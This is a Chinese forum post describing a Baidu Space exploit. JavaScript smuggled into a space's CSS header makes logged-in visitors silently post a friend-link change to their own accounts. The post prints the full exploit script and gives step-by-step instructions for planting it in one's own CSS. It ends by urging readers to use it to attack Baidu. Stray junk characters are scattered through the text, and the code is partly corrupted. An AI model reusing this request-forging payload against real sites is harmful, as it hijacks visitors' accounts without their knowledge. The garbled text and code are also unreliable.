自己的百度空間,瘋狂複製css代碼。但與此同時也出現了百度空間的網絡黑手,利用百度空間的功能,加入自己的代碼,而這些代碼又是惡意的,導致百度空間的用戶遭遇危險。
8 Q- y9 v1 \# }! k4 w0 J+ V: f, x0 ^- u8 o( L
這是一個網友發來的短信求助,原文如下: 5 ?8 k, D% l6 i3 T4 o: w
; ^- {% Q$ ~! ?/ m/ _
有個黑客用javascript把我的鏈接改了..並威脅我如果刪除連接就刪除我的空間,最怕的就是這樣的人..我想問您瞭解一下他能用同樣的手段篡改我頁面的其他信息嗎..最好能告訴小弟對付這樣的人的辦法,我實在沒轍了,好鬱悶..謝謝.. % [; C2 W& ], I& y
& t- d0 _4 h: i7 U
當時筆者找到該"黑客"的空間,輕鬆發現其利用css代碼加入js代碼,然後又利用js代碼的功能,分析百度空間在提交數據時的參數,構造出來一個惡意的js代碼,功能是提交一個加入友情鏈接的請求到百度空間,導致訪問該網站的已登陸百度空間用戶在自己空間上自動的加一個友情鏈接.
: q0 Y, ]5 _, e6 U+ D
( Y i" K6 v4 {5 L9 P 下邊是利用代碼: javascript:document.body.onload = function(){
1 ^6 l8 @# M' C) t# E, q7 m6 t. T+ V/ M$ f/ M! f! u @
. m& h. |( h. _: X& i. D! r1 {: q
var req = null; 2 r+ h& f$ L- `
if(window.XMLHttpRequest) req = new XMLHttpRequest(); , R/ `, r; q' Q3 T! c, i1 _
else if(window.ActiveXObject){ : ]& t y S ?& G
var msxml = new Array('MSXML2.XMLHTTP.5.0', 'MSXML2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP', 'Microsoft.XMLHTTP');
( E, b% p, U) D) V% ^/ U$ U7 x7 G( T" Ffor(var i=0;i
" E- s& Y6 I; Z7 g0 }3 ^" Vtry{req.overrideMimeType('text/xml')}catch(e){} @5 P0 d* G" {# D0 }: A
} , z" b6 e/ n0 {
req.open('get','.',false);
! q Z9 r! G5 f1 a' Vreq.send(); 7 S; u0 l6 V( t3 l
var s=req.responseText; - m: H3 Z+ G0 x% e, n- r- F2 }# a9 [
p=s.indexOf('passport.baidu.com/?logout'); 5 d# z3 A `7 a8 b
if(p>0)
* W; b. P1 s6 i0 X4 S{ & ~8 J h2 L0 |' z( [+ `8 w& \; @ J
p=s.indexOf(''); / c+ W. |" [& r" `, }" W5 E
if(p>0) 0 y5 ^' T$ D4 }9 T4 h8 @4 a4 [) ]
{
: \+ K# y' s0 \; {3 e7 tp=s.indexOf('/',p);
0 a2 Z7 z8 J/ ^, v+ L6 v( i7 cp2=s.indexOf(String.fromCharCode(34),p); 8 v: H2 G0 N$ A/ \7 w
var user=s.substring(p+1,p2);
& p8 B& r1 F; m( K; o: I9 ]5 N6 Avar name='+%B0%D9%B6%C8%BF%D5%BC%E4%B7%A2%CC%FB%D6%FA%CA%D6 '; ' ^/ b3 E5 R m& t, F, @7 t
var link='http://hi.baidu.com/haomm'; " M6 A6 w' f- p4 k' u( d
var desc='%CA%B9%C4%E3%B5%C4%B0%D9%B6%C8%BF%D5%BC%E4%D6%A7%B3%D6html%B7%A2%CC%FB'; 2 h5 B) F) A, I# m1 s
var url='/'+user+'/commit'; 2 s/ [% a1 m+ a7 W
var data='ct=6&cm=1&spRef='+escape('http://hi.baidu.com/'+user)+'%2Fmodify%2Fbuddylink%2F0&spBuddyName='+escape(name)+'&spBuddyURL='+escape(link)+'&spBuddyIntro='+escape(desc); * c& }# U& C$ Z/ R
req.open('post',url,false);
6 n# ? p+ h, Z: C. Ureq.send(data); + ^/ j9 l+ l* N% O
}
& T4 }# K `3 e' V}
% f+ s! \, {3 @+ J2 P& ] n} |
0 \6 @0 q6 B3 ?0 S9 `$ r% z
) k# m1 M5 ~% U! p8 D9 S% q. u6 O2 T4 c& B/ v
分析:
6 f( {( T; ~, t/ B1 z& K& j+ }9 c3 @2 X0 R4 j9 E
該方法危險等級:高級.構造相應的js代碼可以刪除用戶空間的所有數據.該漏洞目前未發現有惡意刪除的現象,但已足夠危險,請用戶小心.
9 r% C- P: H" H# `
+ I# M" j1 y. ]- { Q 解決辦法:
6 b+ R' @2 B0 `! \( {
# Y# h. k. p7 Z 由於攻擊者可能利用任何用戶名的百度空間提交增加,刪除,更改的鏈接,所以目前沒有完美解決辦法.
! C+ V2 \0 t6 G- R+ j* e
% s$ ~: p) D n; x; d: k( u 給已經受害者解決辦法:刪除惡意鏈接,不再在登陸的情況下訪問其空間鏈接. ) K, m$ Q& Q4 e/ w& @% ]# H
4 s" m; w$ b! L9 U7 P2 E2 U
利用方法,演示及聲明:
- U, W6 K) E v! w* y9 E. a9 P; k; u, c4 [' o+ ~# n
本空間加入了該漏洞代碼的利用演示,使用方法:在自己空間css裡面找到#header{},在裡面加入上述代碼即可.形式如:#header{height:200px;background:url("上文js代碼");}請小心使用。% j B2 g2 {0 E5 ]5 V2 p p* A. u
; e/ n+ h F+ G3 `$ \
) @! G, |& i! |) t2 c) K. L4 { 0 O7 P+ G* F: ^9 j; J. m7 D
腦子裡模擬你是 你對手的站長 , \/ t) D4 }0 ^) }9 t. z. i5 E
利用以上方法強姦百度 |
|